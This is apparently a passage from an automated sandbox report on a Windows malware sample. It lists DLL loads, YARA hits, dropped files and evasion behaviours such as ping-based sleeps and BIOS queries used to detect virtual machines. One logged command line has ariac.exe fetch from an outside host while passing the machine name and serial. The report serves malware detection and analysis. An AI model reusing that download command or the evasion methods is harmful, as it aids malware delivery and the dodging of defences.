Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\more.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\SysWOW64\more.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32 Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File written: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appinfo.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Static file information: File size 5650432 > 1048576
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x557200
Source: Binary string: NapiNSP.pdbUGP source: firefox.exe, 00000011.00000003.2508775813.00000243577B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000011.00000003.2508775813.00000243577B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netprofm.pdb source: firefox.exe, 00000011.00000003.2504585407.0000024369605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netprofm.pdbUGP source: firefox.exe, 00000011.00000003.2504585407.0000024369605000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Obfuscated command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\ariac.exe \Users\user\TMP\cr-20241021-53901\ariac.exe -l log2.txt -o result.html "http://upjv.info/clean/entree.php?poste=user-PC^&serial=F2LEUD3EOH"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\ariac.exe \Users\user\TMP\cr-20241021-53901\ariac.exe -l log2.txt -o result.html "http://upjv.info/clean/entree.php?poste=user-PC^&serial=F2LEUD3EOH" Jump to behavior
Yara detected BatToExe compiled binary
Source: Yara match File source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, type: SAMPLE
Source: Yara match File source: 0.0.SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2223771083.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2157879689.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2237351744.0000000001B67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2223024451.0000000002AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2144398167.00000000024F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2067844678.000000000040D000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2223110402.0000000002AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2142911942.0000000000D04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2244829208.00000295A9E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2224729495.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2157997210.00000000021C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2237260409.0000000001B66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2142647323.0000000003186000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2158345471.0000000002630000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2142911942.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2210446103.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2224220104.0000000002A60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2157879689.0000000000730000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2210406341.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2223024451.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2226505928.0000000003070000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2223110402.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2226559592.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2899329779.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2238482972.0000000001B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2238231270.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2238231270.0000000001819000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2143550967.000000000166D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2210504115.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2898564009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2244829208.00000295A9E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2223569597.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2210504115.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2243026015.00000295A9A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2224793423.0000000002AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2899329779.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2157782435.0000000000530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2226536723.0000000003130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2222855195.0000000002B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2143550967.0000000001660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2238569276.0000000001CB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2238569276.0000000001CB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2224864903.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2243026015.00000295A9A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2224959404.0000000002B1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2143628501.0000000003188000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe PID: 6304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ariac.exe PID: 4536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: clean.exe PID: 7124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7z.exe PID: 5960, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WMIC.exe PID: 5548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: more.com PID: 2212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ariac.exe PID: 1292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: firefox.exe PID: 1164, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Code function: 0_2_00407551 LoadLibraryA,GetProcAddress,GetVersionExA, 0_2_00407551
PE file contains sections with non-standard names
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Static PE information: section name: .code
Source: ariac.exe.0.dr Static PE information: section name: .xdata
Source: ariac.exe.2.dr Static PE information: section name: .xdata
Source: clean.exe.4.dr Static PE information: section name: .sxdata
Source: 7-zip.dll.5.dr Static PE information: section name: .sxdata
Source: 7z.dll.5.dr Static PE information: section name: .sxdata
Source: 7z.exe.5.dr Static PE information: section name: .sxdata
Source: 7zFM.exe.5.dr Static PE information: section name: .sxdata
Source: 7zG.exe.5.dr Static PE information: section name: .sxdata
Source: 7-zip32.dll.5.dr Static PE information: section name: .sxdata
Source: 7z.sfx.5.dr Static PE information: section name: .sxdata
Source: 7zCon.sfx.5.dr Static PE information: section name: .sxdata
Source: 7z.sfx0.5.dr Static PE information: section name: .sxdata
Source: 7zCon.sfx0.5.dr Static PE information: section name: .sxdata
Source: gmpopenh264.dll.tmp.17.dr Static PE information: section name: .rodata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_004272C0 push eax; ret 5_2_004272DE
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00427660 push eax; ret 5_2_0042768E
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_0041FD90 push ecx; mov dword ptr [esp], ecx 5_2_0041FD91
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C83220 push ecx; mov dword ptr [esp], ecx 10_2_00C83221
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C836F0 push eax; ret 10_2_00C8370E
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C83AA0 push eax; ret 10_2_00C83ACE
Drops PE files
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zCon.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zFM.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zCon.sfx Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7-zip.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.sfx Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy) Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zG.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe File created: C:\Users\user\Desktop\ariac.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip32.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zG.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zFM.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\7-ZipPortable.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zCon.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zCon.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\License.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\readme.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\License.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\readme.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\DefaultData\settings\settings_readme.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\readme.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\LauncherLicense.txt Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe File created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\Readme.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 420
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 420 Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 22_2_00000184C7D42377 rdtsc 22_2_00000184C7D42377
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Window / User API: threadDelayed 9999 Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Window / User API: threadDelayed 412
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zCon.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zFM.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zCon.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7-zip.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7zG.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7-zip32.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.sfx Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zG.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip64\7z.dll Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7zFM.exe Jump to dropped file
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Dropped PE file which has not been started: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\7-ZipPortable.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe TID: 1896 Thread sleep time: -49995s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE TID: 3836 Thread sleep count: 412 > 30
Source: C:\Windows\SysWOW64\PING.EXE TID: 3836 Thread sleep time: -412000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Thread sleep count: Count: 9999 delay: -5 Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00403E37 FindFirstFileW, 5_2_00403E37
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C55869 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00C55869
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C575DA FindFirstFileW, 10_2_00C575DA
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_0040451D __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 5_2_0040451D
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_004058A6 GetSystemInfo, 5_2_004058A6
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\cr-20241021-53901'\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\Users\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\ Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File opened: C:\Users\user\TMP\cr-20241021-53901\'\Users\user\TMP\ Jump to behavior
Source: firefox.exe, 00000014.00000002.3343503379.000001F527D5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW[
Source: ariac.exe, 00000004.00000002.2143550967.000000000166D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: firefox.exe, 00000016.00000002.3341905004.00000184C77A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: firefox.exe, 00000011.00000003.2250734124.000002434D0E4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3338861198.000001F52755A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3343503379.000001F527D5A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3336842750.00000184C6FAA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3341905004.00000184C77A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000016.00000002.3341905004.00000184C77A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: firefox.exe, 00000017.00000002.3337176956.0000025EFE13A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW A`
Source: firefox.exe, 00000014.00000002.3342843937.000001F52791E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: firefox.exe, 00000017.00000002.3342383857.0000025EFE600000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHt
Source: ariac.exe, 0000000E.00000002.2238231270.0000000001831000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3343503379.000001F527D40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3338861198.000001F52755A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3341905004.00000184C77A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
